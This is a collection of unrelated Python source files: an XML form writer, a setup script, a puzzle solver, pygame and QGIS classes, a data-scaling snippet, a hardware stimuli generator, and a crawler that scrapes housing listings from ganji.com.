    """Write the Parallel Works input-form xml for *sample_case* via the
    input_form helper module (successor of writeXMLPWfile_old).

    Parameters whose type string is empty are treated as sectionless, and a
    placeholder <outputs> element pointing at output.txt is always appended.
    """
    import input_form
    from lxml import etree
    param_values = convertListOfDicts2Dict(sample_case)
    # Convert empty parameter strings to None
    for key, value in param_types.items():
        if not value:
            param_types[key] = None
    # Create an input object
    inp = input_form.Inputs()
    for param_name, value in param_values.items():
        param = input_form.Param(param_name, value, 'text',
                                 section_name=param_types[param_name],
                                 help_text=help_text)
        inp.add_param(param)
    # Create the xml
    form = input_form.create_form_xml(tool_name=user_name+'_'+workflow_name,
                                      swift_script=swift_script)
    # add the input element to the xml
    form_input = etree.SubElement(form, "inputs")
    for param in inp.params:
        param.add_to_xml(form_input)
    for section_name, section in inp.sections.items():
        s = section.add_to_xml(form_input)
        for ip in section.params:
            ip.add_to_xml(s)
    # add a place holder for specifying workflow outputs
    outs = etree.SubElement(form, "outputs")
    data = etree.SubElement(outs, "data")
    data.set('name','output')
    data.set('type', 'data')
    data.set('format', 'txt')
    data.set('label', 'output.txt')
    # Echo the generated xml (debug/log) before writing it out.
    print(etree.tostring(form, pretty_print=True).decode('utf-8'))
    fxml = data_IO.open_file(xml_file, "w")
    fxml.write(etree.tostring(form, pretty_print=True).decode('utf-8'))
    fxml.close()
|
'Computer vision as a Service - Python Client'
from setuptools import setup
setup(
    name='cvas',
    version='1.1.28',
    description='Computer Vision as a Service Python Client',
    long_description='Computer Vision as a Service Python Client.',
    license='MIT',
    author='Adam Jez',
    author_email='adamjez@outlook.cz',
    packages=['cvas'],
    # 'json' and 'tempfile' are Python standard-library modules, not PyPI
    # distributions; listing them in install_requires makes pip install
    # unrelated (or nonexistent) packages, so only real third-party
    # dependencies are declared here.
    install_requires=[
        'requests',
    ]
)
|
# BOJ 11559
import sys
from collections import deque
# Fast stdin reader (unused while the board below is hard-coded).
si = sys.stdin.readline
# Neighbour offsets for the four cardinal directions; bfs() pairs
# dx[i] with x and dy[i] with y.
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
def bfs(init_y: int, init_x: int, c: int) -> list:
    """Collect the connected component of colour *c* containing
    (init_y, init_x) on the 12x6 board via breadth-first search.

    Marks cells in the module-level ``visited`` grid and reads ``graph``.
    """
    queue = deque([(init_y, init_x)])
    visited[init_y][init_x] = True
    component = [(init_y, init_x)]
    while queue:
        y, x = queue.popleft()
        # Same neighbour order as the module-level dx/dy tables.
        for oy, ox in ((0, -1), (0, 1), (-1, 0), (1, 0)):
            ny, nx = y + oy, x + ox
            if 0 <= ny < 12 and 0 <= nx < 6 and not visited[ny][nx] and graph[ny][nx] == c:
                visited[ny][nx] = True
                queue.append((ny, nx))
                component.append((ny, nx))
    return component
def has_to_remove(vector: list) -> bool:
    """Clear the group from the module-level ``graph`` and report True when
    it contains four or more cells (a poppable puyo group)."""
    if len(vector) < 4:
        return False
    for y, x in vector:
        graph[y][x] = 0
    return True
def block_down():
    """Apply gravity to the module-level ``graph``: scanning each column
    bottom-up, pull the nearest block above into every empty cell."""
    for row in range(11, 0, -1):
        for col in range(6):
            if graph[row][col] != 0:
                continue
            # Find the closest non-empty cell above and swap it down.
            for above in range(row, -1, -1):
                if graph[above][col] > 0:
                    graph[row][col], graph[above][col] = graph[above][col], graph[row][col]
                    break
def transform(el):
    """Map a board character to its colour code ('.'=0, R=1, G=2, B=3,
    P=4, Y=5); any other value is returned unchanged."""
    return {".": 0, "R": 1, "G": 2, "B": 3, "P": 4, "Y": 5}.get(el, el)
# Stdin-based board reading, disabled in favour of the hard-coded test board.
# graph = []
# for _ in range(12):
#     temp = list(si().strip())
#     transformed = list(map(transform, temp))
#     graph.append(transformed)
# Hard-coded 12x6 board: 0 = empty, 1..5 = colours (see transform()).
graph = [[0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0],
         [0, 5, 0, 0, 0, 0],
         [0, 5, 2, 0, 0, 0],
         [1, 1, 5, 2, 0, 0], [1, 1, 5, 2, 2, 0]]
chain = 0
while True:
    visited = [[False for _ in range(6)] for _ in range(12)]
    passed = []
    again = False
    # One sweep: remove every group of 4+ same-coloured connected cells.
    for i in range(12):
        for j in range(6):
            if not visited[i][j] and graph[i][j] > 0:
                passed = bfs(i, j, graph[i][j])
                if has_to_remove(passed):
                    again = True
    # Nothing popped this round: the chain reaction has ended.
    if not again:
        break
    block_down()
    chain += 1
# Print the settled board followed by the number of chain steps.
for i in range(12):
    print(" ".join(list(map(str, graph[i]))))
print(chain)
|
import pygame
class Tile(pygame.sprite.Sprite):
    """A square grey level tile that can be scrolled horizontally."""

    def __init__(self, pos, size):
        """Create a size x size grey surface with its top-left at *pos*."""
        super().__init__()
        surface = pygame.Surface((size, size))
        surface.fill('grey')
        self.image = surface
        self.rect = self.image.get_rect(topleft=pos)

    def update(self, x_shift):
        """Shift the tile horizontally by *x_shift* pixels (camera scroll)."""
        self.rect.x += x_shift
from qgis.core import *
from qgis.gui import *
from PyQt4.QtGui import *
from PyQt4.QtCore import *
class CrossSymbolLayer(QgsMarkerSymbolLayerV2):
    """Custom QGIS marker symbol layer drawing an X-shaped cross."""

    def __init__(self, length=10.0, width=2.0):
        QgsMarkerSymbolLayerV2.__init__(self)
        self.length = length
        self.width = width

    def layerType(self):
        """Unique id used by the symbol layer registry."""
        return "Cross"

    def properties(self):
        """Serializable state, restored by the metadata factory."""
        return {'length': self.length, 'width': self.width}

    def clone(self):
        return CrossSymbolLayer(self.length, self.width)

    def startRender(self, context):
        # Create the pen once per render pass; colour is set per point.
        self.pen = QPen()
        self.pen.setWidth(self.width)

    def stopRender(self, context):
        self.pen = None

    def renderPoint(self, point, context):
        """Draw two diagonal strokes crossing at *point*."""
        x_min = point.x() - self.length
        x_max = point.x() + self.length
        y_min = point.y() - self.length
        y_max = point.y() + self.length
        # Selected features are drawn in the canvas selection colour.
        colour = context.selectionColor() if context.selected() else self.color()
        self.pen.setColor(colour)
        painter = context.renderContext().painter()
        painter.setPen(self.pen)
        painter.drawLine(x_min, y_min, x_max, y_max)
        painter.drawLine(x_max, y_min, x_min, y_max)
class CrossSymbolLayerWidget(QgsSymbolLayerV2Widget):
    """Qt form with Length/Width spin boxes for editing a CrossSymbolLayer."""
    def __init__(self, parent=None):
        QgsSymbolLayerV2Widget.__init__(self, parent)
        self.layer = None
        self.lengthField = QSpinBox(self)
        self.lengthField.setMinimum(1)
        self.lengthField.setMaximum(100)
        # Old-style PyQt4 signal connection.
        self.connect(self.lengthField,
                     SIGNAL("valueChanged(int)"),
                     self.lengthChanged)
        self.widthField = QSpinBox(self)
        self.widthField.setMinimum(1)
        self.widthField.setMaximum(100)
        self.connect(self.widthField,
                     SIGNAL("valueChanged(int)"),
                     self.widthChanged)
        self.form = QFormLayout()
        self.form.addRow("Length", self.lengthField)
        self.form.addRow("Width", self.widthField)
        self.setLayout(self.form)
    def setSymbolLayer(self, layer):
        # Only accept layers of our own type; populate the fields from it.
        if layer.layerType() == "Cross":
            self.layer = layer
            self.lengthField.setValue(layer.length)
            self.widthField.setValue(layer.width)
    def symbolLayer(self):
        """Return the layer being edited (None until setSymbolLayer is called)."""
        return self.layer
    def lengthChanged(self, n):
        # Push the spin-box value into the layer and notify QGIS.
        self.layer.length = n
        self.emit(SIGNAL("changed()"))
    def widthChanged(self, n):
        self.layer.width = n
        self.emit(SIGNAL("changed()"))
class CrossSymbolLayerMetadata(QgsSymbolLayerV2AbstractMetadata):
    """Registry metadata/factory for the Cross marker symbol layer."""

    def __init__(self):
        QgsSymbolLayerV2AbstractMetadata.__init__(self,
                                                  "Cross",
                                                  "Cross Marker",
                                                  QgsSymbolV2.Marker)

    def createSymbolLayer(self, properties):
        """Rebuild a CrossSymbolLayer from serialized properties, falling
        back to the defaults (length 10, width 2)."""
        length = int(properties['length']) if "length" in properties else 10
        width = int(properties['width']) if "width" in properties else 2
        return CrossSymbolLayer(length, width)

    def createSymbolLayerWidget(self, layer):
        return CrossSymbolLayerWidget()
# Register the custom layer type so QGIS can offer it in the style dialogs.
registry = QgsSymbolLayerV2Registry.instance()
registry.addSymbolLayerType(CrossSymbolLayerMetadata())
|
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
# Standardize every column of 039.csv (zero mean, unit variance) and print it.
df = pd.read_csv("039.csv")
scaler = StandardScaler()
# fit_transform == fit followed by transform for StandardScaler.
df_scaled = scaler.fit_transform(df)
print(df_scaled)
|
# Copyright 2019 ETH Zurich, Lukas Cavigelli and Georg Rutishauser
# Copyright and related rights are licensed under the Solderpad Hardware
# License, Version 0.51 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://solderpad.org/licenses/SHL-0.51. Unless required by applicable law
# or agreed to in writing, software, hardware and materials distributed under
# this License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
from stimuli_params import StimuliParams
import random
import numpy as np
import torch
# Fix all RNG seeds so the generated stimuli are reproducible.
torch.manual_seed(220)
random.seed(9)
np.random.seed(62)
# Fraction of each feature map sampled into the stimuli — TODO confirm.
FM_FRAC = 0.05
BATCH_SIZE = 1
N_BATCH = 4
# Data word width in bits; LOG_MAX_WORDS sizes the word counter —
# presumably log2 of the maximum word count, verify in StimuliParams.
DATA_W = 8
LOG_MAX_WORDS = 24
MAX_ZRLE_LEN = 16
BLOCK_SIZE = 8
#Adjust these to your needs - it's recommended to use absolute paths.
BASE_STIM_DIRECTORY = '/home/georgr/projects/stream-ebpc/simvectors'
DATASET_PATH = '/usr/scratch2/risa/georgr/imagenet/imgs'
DEBUG_FILE = None
SAFETY_FAC = 0.75
MODULES = ['encoder', 'decoder']
#NETS = ['vgg16', 'resnet34', 'mobilenet2', 'random', 'all_zeros']
#NETS = ['vgg16', 'resnet34']
NETS = ['resnet34']
#NETS = ['last_test']
#NETS = ['random', 'all_zeros']
#import pydevd_pycharm
#pydevd_pycharm.settrace('risa', port=9100, stdoutToServer=True, stderrToServer=True)
# Build one StimuliParams set per selected network, then write them all out.
stims = []
for net in NETS:
    # The debug file only applies to the vgg16 run.
    dbg_f = DEBUG_FILE if net == 'vgg16' else None
    stims.append(StimuliParams(network=net, fm_frac=FM_FRAC,
                 batch_size=BATCH_SIZE, modules=MODULES, n_batches=N_BATCH, data_w=DATA_W,
                 max_zrle_len=MAX_ZRLE_LEN, block_size=BLOCK_SIZE,
                 dataset_path=DATASET_PATH, num_words_width=LOG_MAX_WORDS,
                 debug_file=dbg_f, safety_factor=SAFETY_FAC))
for stim in stims:
    stim.write(BASE_STIM_DIRECTORY)
|
#coding=UTF-8
'''
Created on 2011-7-6
@author: Administrator
'''
from urlparse import urlparse
import cookielib
from pyquery.pyquery import PyQuery #@UnresolvedImport
import re
import datetime #@UnusedImport
import urllib2
from lxml import etree #@UnresolvedImport
from lxml.cssselect import CSSSelector #@UnresolvedImport
import simplejson as js #@UnusedImport @UnresolvedImport
from config import housetype, checkPath, makePath,fitment,toward,deposit, isDEV,\
citynameDict_sf, getDefaultVal
import threading
from BeautifulSoup import BeautifulSoup #@UnresolvedImport
import time
import gc
from jjrlog import msglogger, LinkLog
from common import postHost
# Root directory where crawled listings are stored (per-kind subfolders below).
homepath="F:\\home\\spider\\"
# Explicitly enable garbage collection for this long-running crawler.
gc.enable()
class LinkCrawl(object):
    """Crawl ganji.com listing-index pages for one city and listing kind and
    hand every not-yet-stored detail link to getContent().

    kind: "1" = for sale, "2" = for rent, "3" = wanted to buy,
    "4" = wanted to rent.  (Python 2 code.)
    """
    def __init__(self,citycode="",kind="",upc="5",st="3"):
        cj = cookielib.MozillaCookieJar()
        self.br=urllib2.build_opener(urllib2.HTTPHandler(),urllib2.HTTPCookieProcessor(cj),urllib2.HTTPRedirectHandler())
        self.header={
            "User-Agent":'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 3.5.30729)',
        }
        # Poster-history threshold, forwarded to getContent().
        self.upc=upc
        # Listings older than yesterday stop the crawl (kinds 3/4 only).
        self.endtime=str(datetime.date.today() -datetime.timedelta(days=1))
        self.clinks=[]
        self.pn=[]
        self.citycode=citycode
        self.baseUrl="http://%s.ganji.com"%self.citycode
        self.kind=kind
        if kind=="1":# for sale
            self.urlpath="/fang5/a1u2%s/"
            self.folder="sell\\"
        elif kind=="2":# for rent
            self.urlpath="/fang1/u2%s/"
            self.folder="rent\\"
        elif kind=="3":# wanted to buy
            self.urlpath="/fang4/u2f0/a1%s/"
            self.folder="buy\\"
        elif kind=="4":# wanted to rent
            self.urlpath="/fang2/u2f0/a1%s/"
            self.folder="req\\"
    def __getAllNeedLinks(self):
        """Walk the paginated index (32 listings per page) until the pager
        stops advancing or listings become older than self.endtime, fetching
        every link not yet saved under homepath."""
        cond=True
        idx=0
        checkit="0"
        while cond:
            url=self.baseUrl+self.urlpath%("f"+str(idx*32))
            #url="http://gz.ganji.com/fang2/u2f0/a1f768/"
            # print url
            try:
                req=urllib2.Request(url, None, self.header)
                p=self.br.open(req).read()
            except:
                # Network error: retry the same page.
                continue
            else:
                # The highlighted pager item repeats once we run past the
                # last page; that terminates the crawl.
                check=PyQuery(p)("ul.pageLink li a.c").text()
                if check==None or check==checkit:
                    cond=False
                    break
                else:
                    checkit=check
                links=PyQuery(p)("div.list dl")
                p=None
                # print len(links)
                for link in links:
                    lk=self.baseUrl+PyQuery(link)(" a.list_title").attr("href")
                    # print lk
                    if self.kind=="3" or self.kind=="4":
                        # Wanted ads carry a post time; stop once it is
                        # older than endtime.  (The literals below are the
                        # Chinese words for "minutes" and "hours".)
                        tm=PyQuery(link)("dd span.time").text()
                        if re.match('''\d{2}-\d{2}''', tm):
                            Y=int(time.strftime('%Y', time.localtime()))
                            tm="%s-%s"%(Y,tm.strip())
                            if tm<self.endtime:
                                cond=False
                                break
                        elif "分钟" in tm:# "N minutes ago" - still fresh
                            pass
                        elif "小时" in tm:# "N hours ago" - still fresh
                            pass
                        else:
                            cond=False
                            break
                    if not checkPath(homepath,self.folder,lk):
                        LinkLog.info("%s|%s"%(self.kind,lk))
                        try:
                            getContent(lk,self.citycode,self.kind,self.upc)
                        except Exception,e:print "ganji getContent Exception %s"%e
                        # fetch_quere.put({"mod":"ganji","link":lk,"citycode":self.citycode,"kind":self.kind})
                    # if lk not in self.clinks:
                    #     self.clinks.append(lk)
            idx=idx+1
        # print len(self.clinks)
    def runme(self):
        """Entry point: crawl all index pages for this city/kind."""
        #self.__initPageNum()
        self.__getAllNeedLinks()
class ContentCrawl(object):
    def __init__(self,links,citycode,kind,upc):
        """Prepare the HTTP opener, the output folder and the per-field
        extraction regexes for one detail page.

        kind: "1" sell, "2" rent, "3" buy, "4" req; upc is the poster-history
        threshold used by mayGetIt().
        """
        cj = cookielib.MozillaCookieJar()
        self.br=urllib2.build_opener(urllib2.HTTPHandler(),urllib2.HTTPCookieProcessor(cj),urllib2.HTTPRedirectHandler())
        self.pdb={}
        self.header={
            "User-Agent":'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 3.5.30729)',
        }
        self.urls=links
        self.kind=kind
        self.fd={}
        self.citycode=citycode
        self.upc=upc
        if kind=="1":
            self.folder="sell\\"
        elif kind=="2":
            self.folder="rent\\"
        elif kind=="3":
            self.folder="buy\\"
        else:
            self.folder="req\\"
        # Regexes for values embedded in the page's inline JS.
        self.xiaoqu_regex="xiaoqu : '(.*?)',"
        self.address_regex="address : '(.*?)',"
        # Regexes for the HTML detail fields; the patterns contain the
        # Chinese field labels used on ganji.com and must not be altered.
        self.house_room_regex="(\d+)室"
        self.house_hall_regex="(\d+)厅"
        self.house_toilet_regex="(\d+)卫"
        self.house_veranda_regex="(\d+)阳台"
        self.house_desc_regex="房屋概况</p>(.*?)</p>"
        self.house_floor_regex="<li>楼层: 第(\d+)层/总(\d+)层</li>"
        self.house_totalarea_regex="<li>面积: (\d+) ㎡</li>"
        self.house_totalarea_regex_qiu="(\d+)㎡"
        self.house_type_regex3="<li>户型: (.*)</li>"
        self.house_toward_regex="<li>朝向: (.*)</li>"
        self.house_type_regex="<li>类型: (.*)</li>"
        self.cityarea_regex="<li>区域:([\s\S]*?)</li>"
        self.house_age_regex="<li>房龄: (\d+) 年</li>"
        self.house_fitment_regex="<li>装修: (.*)</li>"
        self.house_support_regex="<li>配置: (.*) </li>"
        self.house_price_regex="<li>售价: <span>(.*)</span>.*</li>"
        self.house_price_regex_2="<li>租金: <span>(.*)</span>.*</li>"
        self.borough_name_regex="<li>小区:(.*)</li>"
        self.house_deposit_regex="<li>租金: (.*)</li>"
        self.house_price_regex_zu = "<li>期望租金: (.*)</li>"
        self.borough_name_regex_reg = "<li>期望小区: (.*)</li>"
        self.house_addr_regex_reg = "<li>小区地址:(.*)</li>"
        self.house_price_regex_gou = "<li>期望售价: (.*)</li>"
def __addText(self,tag, no_tail=False):
text = []
if tag.text:
text.append(tag.text)
for child in tag.getchildren():
text.append(self.__addText(child))
if not no_tail and tag.tail:
text.append(tag.tail)
return "".join(text)
def getText(self,html):
text=[]
for tag in html:
text.append(self.__addText(tag, no_tail=True))
return ' '.join([t.strip() for t in text if t.strip()])
    def mayGetIt(self,page):
        """Heuristic agent filter: follow the poster's history page and skip
        posters with more than self.upc previous listings.

        Returns True when the listing should be skipped; network or parse
        failures err on the side of skipping (True).
        """
        try:
            href=PyQuery(page)("a.userHistory").attr("href")
            if href==None:
                # No history link on the page: treat the poster as private.
                return False
            href="http://%s.ganji.com%s"%(self.citycode,href)
            resp = urllib2.urlopen(urllib2.Request(href, None, self.header)).read()
            trs=PyQuery(resp)("table.tel_list tr")
        except:
            return True
        # print "user list-------->%s| %s"%((len(trs)-1),self.urls)
        # First table row is the header, hence len(trs)-1 listings.
        if len(trs)-1>int(self.upc):
            return True
        else:
            return False
def sell(self,url):
request = urllib2.Request(url, None, self.header)
response = urllib2.urlopen(request).read()
if self.mayGetIt(response):
self.fd={}
raise
tree = etree.HTML(response)
soup =BeautifulSoup(response)
self.fd['house_flag'] = 1
self.fd['house_belong']=0
self.fd['owner_phone']=''
self.fd['house_area_max']=0
self.fd['house_price_max']=''
detail_mer = soup.find('div',{'class':'detail_mer'})
#非个人房源 return
if u"个人房源" not in str(detail_mer):raise
Dname = detail_mer.find('span',{'class':'Dname'})
if Dname:
self.fd['owner_name'] = str(Dname.string)
else:
self.fd['owner_name'] = None
ganji_phone_call_class = detail_mer.find('span',{'class':'ganji_phone_call_class'})
if ganji_phone_call_class:
self.fd['owner_phone_pic'] = ganji_phone_call_class.contents[0]
if str(ganji_phone_call_class).find('src='):
self.fd['owner_phone_pic'] = 'http://'+urlparse(url)[1]+ganji_phone_call_class.img['src']
else:
self.fd['owner_phone_pic'] = None
else:
self.fd['owner_phone_pic'] = None
#没有联系方式 return
if not self.fd['owner_phone_pic']:raise
if re.search("<span class=\"city\"><a .*?>(.*?)</a>", response):
cityname=re.search("<span class=\"city\"><a .*?>(.*?)</a>", response).group(1)
self.fd['cityname'] = cityname
else:
raise
if re.search(self.house_floor_regex, response):
house_floor=re.search(self.house_floor_regex, response).group(1)
house_topfloor=re.search(self.house_floor_regex, response).group(2)
self.fd['house_floor'] = int(house_floor)
self.fd['house_topfloor'] = int(house_topfloor)
else:
self.fd['house_floor'] = 0
self.fd['house_topfloor'] = 0
if re.search(self.house_totalarea_regex, response):
house_totalarea=re.search(self.house_totalarea_regex, response).group(1)
self.fd['house_area'] = int(house_totalarea)
else:
self.fd['house_area'] = 0
#类型
if re.search(self.house_type_regex, response):
house_type=re.search(self.house_type_regex, response).group(1)
self.fd['house_type'] = housetype(house_type)
else:
self.fd['house_type'] = 6
if re.search(self.house_price_regex, response):
house_price=re.search(self.house_price_regex, response).group(1)
if house_price=="面议":
house_price=0
self.fd['house_price'] = int(house_price)
else:
self.fd['house_price'] = 0
#posttime=CSSSelector('span.pub_time')(tree)!=None and CSSSelector('span.pub_time')(tree)[0].text.strip() or None
#if posttime:
#Y=int(time.strftime('%Y', time.localtime()))
#M=int(posttime.split(' ')[0].split('-')[0])
#D=int(posttime.split(' ')[0].split('-')[1])
#s = datetime.datetime(Y,M,D,0,0)
#posttime=int(time.mktime(s.timetuple()))
#self.fd['house_posttime'] =posttime
#else:
#self.fd['house_posttime'] =None
if re.search(self.house_room_regex, response):
house_room=re.search(self.house_room_regex, response).group(1)
self.fd['house_room'] = int(house_room)
else:
self.fd['house_room'] = 0
if re.search(self.house_hall_regex, response):
house_hall=re.search(self.house_hall_regex, response).group(1)
self.fd['house_hall'] = int(house_hall)
else:
self.fd['house_hall'] = 0
if re.search(self.house_toilet_regex, response):
house_toilet=re.search(self.house_toilet_regex, response).group(1)
self.fd['house_toilet'] = int(house_toilet)
else:
self.fd['house_toilet'] = 0
if re.search(self.house_veranda_regex, response):
house_veranda=re.search(self.house_veranda_regex, response).group(1)
self.fd['house_veranda'] = int(house_veranda)
else:
self.fd['house_veranda'] = 0
house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
self.fd['house_title'] = house_title.replace("(求购)","").replace("(求租)","").replace("(出售)","")
#描述
detail_box = soup.find('div',{'class':'detail_box'})
if detail_box:
house_desc = str(detail_box('p')[1])
self.fd['house_desc'] = re.sub("<.*?>|\n|\r|\t|联系我时请说明是从赶集网上看到的","",house_desc)
else:
self.fd['house_desc'] = ""
d_i = soup.find('ul',{'class':'d_i'})
#小区名
#先处理JS
if re.search(self.xiaoqu_regex, response):
borough_name=re.search(self.xiaoqu_regex, response).group(1)
self.fd['borough_name'] = borough_name
if re.search(self.address_regex, response):
house_addr=re.search(self.address_regex, response).group(1)
self.fd['house_addr'] = house_addr
else:
if d_i.find(text="小区: "):
borough_box = d_i.find(text="小区: ").parent
borough_name = borough_box.find("a")
if borough_name:
self.fd['borough_name'] = str(borough_name.string)
else:
self.fd['borough_name'] = None
#地址
if borough_name and borough_name.nextSibling:
house_addr = borough_name.nextSibling.string
self.fd['house_addr'] = re.sub("\(|\)| ","",house_addr)
else:
self.fd['house_addr'] = ""
else:
if re.search(self.borough_name_regex, response):
borough_name=re.search(self.borough_name_regex, response).group(1)
self.fd['borough_name'] = re.sub("\(.*\)| ","",borough_name)
#区域
area_box = d_i.find(text="区域: ").parent
area_a = area_box('a')
if area_a and len(area_a)>1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = str(area_a[1].string)
elif area_a and len(area_a)==1:
self.fd['house_region'] = str(area_a[0].string)
self.fd['house_section'] = ""
else:
self.fd['house_region'] = ""
self.fd['house_section'] = ""
if re.search(self.house_age_regex, response):
house_age=re.search(self.house_age_regex, response).group(1)
Y=int(time.strftime('%Y', time.localtime()))
house_age=Y-int(house_age)
self.fd['house_age'] = house_age
else:
self.fd['house_age'] = 0
#朝向
if re.search(self.house_toward_regex, response):
house_toward=re.search(self.house_toward_regex, response).group(1)
self.fd['house_toward'] = toward(house_toward)
else:
self.fd['house_toward'] = 0
if re.search(self.house_fitment_regex, response):
house_fitment=re.search(self.house_fitment_regex, response).group(1)
self.fd['house_fitment'] = fitment(house_fitment)
else:
self.fd['house_fitment'] = 2
request = None
response = None
soup=None
tree=None
del tree
del request
del response
del soup
    def buy(self,url):
        """Parse a ganji.com wanted-to-buy listing page and fill self.fd.

        A bare ``raise`` is used as control flow throughout: it aborts
        pages that cannot be used (blocked pages, agency listings, missing
        contact image, unrecognized city).  The caller (extractDict)
        catches the exception.
        """
        self.fd['house_city'] = self.citycode
        self.fd['house_flag'] = 3
        # self.fd['belong']="1"
        request = urllib2.Request(url, None, self.header)
        response = urllib2.urlopen(request).read()
        # mayGetIt() returning True means the site served a block page.
        if self.mayGetIt(response):
            self.fd={}
            raise
        tree = etree.HTML(response)
        soup =BeautifulSoup(response)
        detail_mer = soup.find('div',{'class':'detail_mer'})
        # Not an individual listing (posted by an agency) -> abort
        if u"个人房源" not in str(detail_mer):raise
        Dname = detail_mer.find('span',{'class':'Dname'})
        if Dname:
            self.fd['owner_name'] = str(Dname.string)
        else:
            self.fd['owner_name'] = ""
        # The phone number is only available as an image.
        ganji_phone_call_class = detail_mer.find('span',{'class':'ganji_phone_call_class'})
        if ganji_phone_call_class:
            self.fd['owner_phone_pic'] = ganji_phone_call_class.contents[0]
            if str(ganji_phone_call_class).find('src='):
                self.fd['owner_phone_pic'] = 'http://'+urlparse(url)[1]+ganji_phone_call_class.img['src']
            else:
                self.fd['owner_phone_pic'] = ""
        else:
            self.fd['owner_phone_pic'] = ""
        # No contact information -> abort
        if not self.fd['owner_phone_pic']:raise
        if re.search("<span class=\"city\"><a .*?>(.*?)</a>", response):
            cityname=re.search("<span class=\"city\"><a .*?>(.*?)</a>", response).group(1)
            self.fd['cityname'] = cityname
        else:
            raise
        # Fields that carry no meaning for a wanted-to-buy post get defaults.
        self.fd['house_floor'] = 0
        self.fd['house_topfloor'] = 0
        self.fd['house_type'] = 6
        self.fd['house_age'] = 0
        self.fd['house_toward'] = 0
        self.fd['house_fitment'] = 0
        if re.search(self.house_totalarea_regex_qiu, response):
            house_totalarea=re.search(self.house_totalarea_regex_qiu, response).group(1)
            self.fd['house_area_max'] = int(house_totalarea)
            self.fd['house_area'] = int(house_totalarea)
        else:
            self.fd['house_area'] = 0
            self.fd['house_area_max'] = 0
        # Buyer budget may be "N以上" (at least N), "N以下" (at most N) or a
        # "lo-hi" range, all expressed in 万 (10k CNY) which is stripped off.
        if re.search(self.house_price_regex_gou, response):
            house_price_zu = re.search(self.house_price_regex_gou, response).group(1)
            house_price_zu = house_price_zu.replace('万','')
            if house_price_zu.find("以上") != -1:
                self.fd['house_price_max'] = 0
                self.fd['house_price'] = int(house_price_zu.replace('以上',''))
            elif house_price_zu.find("以下") != -1:
                self.fd['house_price_max'] = int(house_price_zu.replace('以下',''))
                self.fd['house_price'] = 0
            elif house_price_zu.find("-") != -1:
                self.fd['house_price_max'] = int(house_price_zu.split('-')[1])
                self.fd['house_price'] = int(house_price_zu.split('-')[0])
            else:
                self.fd['house_price_max'] = 0
                self.fd['house_price'] = 0
        else:
            self.fd['house_price_max'] = 0
            self.fd['house_price'] = 0
        # Publication time; the page only shows month-day, the year and the
        # current clock time are taken from "now".  Falls back to now.
        posttime=CSSSelector('span.pub_time')(tree)!=None and CSSSelector('span.pub_time')(tree)[0].text.strip() or None
        if posttime:
            Y=int(time.strftime('%Y', time.localtime()))
            M=int(posttime.split(' ')[0].split('-')[0])
            D=int(posttime.split(' ')[0].split('-')[1])
            H=int(time.strftime('%H',time.localtime(time.time())))
            Min=int(time.strftime('%M',time.localtime(time.time())))
            s = datetime.datetime(Y,M,D,H,Min)
            posttime=str(int(time.mktime(s.timetuple())))
            self.fd['house_posttime'] =posttime
        else:
            s=time.localtime(time.time())
            self.fd['house_posttime'] =str(int(time.mktime(s)))
        if re.search(self.house_room_regex, response):
            house_room=re.search(self.house_room_regex, response).group(1)
            self.fd['house_room'] = int(house_room)
        else:
            self.fd['house_room'] = 0
        if re.search(self.house_hall_regex, response):
            house_hall=re.search(self.house_hall_regex, response).group(1)
            self.fd['house_hall'] = int(house_hall)
        else:
            self.fd['house_hall'] = 0
        if re.search(self.house_toilet_regex, response):
            house_toilet=re.search(self.house_toilet_regex, response).group(1)
            self.fd['house_toilet'] = int(house_toilet)
        else:
            self.fd['house_toilet'] = 0
        if re.search(self.house_veranda_regex, response):
            house_veranda=re.search(self.house_veranda_regex, response).group(1)
            self.fd['house_veranda'] = int(house_veranda)
        else:
            self.fd['house_veranda'] = 0
        house_title=CSSSelector("div.detail_title h1")(tree)[0] !=None and CSSSelector("div.detail_title h1")(tree)[0].text.strip() or None
        self.fd['house_title'] = house_title
        # Description text (tags and the site watermark sentence stripped)
        detail_box = soup.find('div',{'class':'detail_box'})
        if detail_box:
            house_desc = str(detail_box('p')[1])
            self.fd['house_desc'] = re.sub("<.*?>|\n|\r|\t|联系我时请说明是从赶集网上看到的","",house_desc)
        else:
            self.fd['house_desc'] = None
        d_i = soup.find('ul',{'class':'d_i'})
        # Neighborhood (residential complex) name.
        # Try the JS-embedded variant first, then the HTML markup.
        if re.search(self.xiaoqu_regex, response):
            borough_name=re.search(self.xiaoqu_regex, response).group(1)
            self.fd['borough_name'] = borough_name
            if re.search(self.address_regex, response):
                house_addr=re.search(self.address_regex, response).group(1)
                self.fd['house_addr'] = house_addr
        else:
            if d_i.find(text="小区: "):
                borough_box = d_i.find(text="小区: ").parent
                borough_name = borough_box.find("a")
                if borough_name:
                    self.fd['borough_name'] = borough_name.string
                else:
                    self.fd['borough_name'] = None
            else:
                if re.search(self.borough_name_regex_reg, response):
                    borough_name=re.search(self.borough_name_regex_reg, response).group(1)
                    self.fd['borough_name'] = borough_name
                if re.search(self.house_addr_regex_reg, response):
                    house_addr=re.search(self.house_addr_regex_reg, response).group(1)
                    self.fd['house_addr'] = house_addr
                else:
                    self.fd['house_addr'] = ''
        # District / section of the city
        area_box = d_i.find(text="区域: ").parent
        area_a = area_box('a')
        if area_a and len(area_a)>1:
            self.fd['house_region'] = str(area_a[0].string)
            self.fd['house_section'] = str(area_a[1].string)
        elif area_a and len(area_a)==1:
            self.fd['house_region'] = str(area_a[0].string)
            self.fd['house_section'] = ""
        else:
            self.fd['house_region'] = ""
            self.fd['house_section'] = ""
        # Drop references so the large parse trees can be collected.
        request = None
        response = None
